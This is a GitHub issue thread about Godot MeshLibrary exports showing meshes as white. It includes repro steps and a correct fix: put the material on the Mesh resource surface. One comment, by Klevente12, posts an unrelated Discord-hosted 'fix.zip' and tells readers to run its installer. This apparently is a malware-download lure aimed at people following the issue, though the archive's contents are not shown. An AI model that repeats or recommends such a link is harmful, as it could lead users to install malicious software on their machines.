### ISSUE TITLE
Mesh Library color not saving

### ISSUE THREAD

**Issue by DaveyCrockett** [godotengine/godot#96505]
### Tested versions

tried in 4.2 and in 4.3

### System information

Godot v4.3.stable - Windows 10.0.22631 - Vulkan (Forward+) - dedicated NVIDIA GeForce RTX 3070 (NVIDIA; 32.0.15.5612) - AMD Ryzen 7 5800X 8-Core Processor (16 Threads)

### Issue description

Im not sure if this is an error with Godot or if I'm just making a mistake. I was running on Godot 4.2 when I created a mesh library with two mesh instances. One red and one gray. I then saved that Mesh library and added it to my gridmap but the saved library shows both mesh instances as white. I then noticed there was a Godot 4.3 so I downloaded that and tried it in that and same issue. any help would be great.
![Screenshot (18)](https://github.com/user-attachments/assets/284676c0-cb53-49f5-b287-c9deb074ff86)
![Screenshot (19)](https://github.com/user-attachments/assets/9751b66c-2346-4187-b60f-471a1320984f)
![Screenshot (20)](https://github.com/user-attachments/assets/16695909-a4a3-4f49-8222-1326846d01be)

### Steps to reproduce

-Create a scene with a grid map
-create a new scene with 2 mesh instances
-set new standard material 3d albedo color
-save scene
-export as mesh library
-add mesh library to grid map

### Minimal reproduction project (MRP)

[BarbarianBlaster.zip](https://github.com/user-attachments/files/16843105/BarbarianBlaster.zip)

**Comment by Klevente12** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by smix8** [comment]
The material needs to be on the Mesh resource surface, not on the instance or override slot of the node.

**Comment by DaveyCrockett** [comment]
Thanks smix8. I'm new to both godot and game dev and your the only one that has solved my problem.
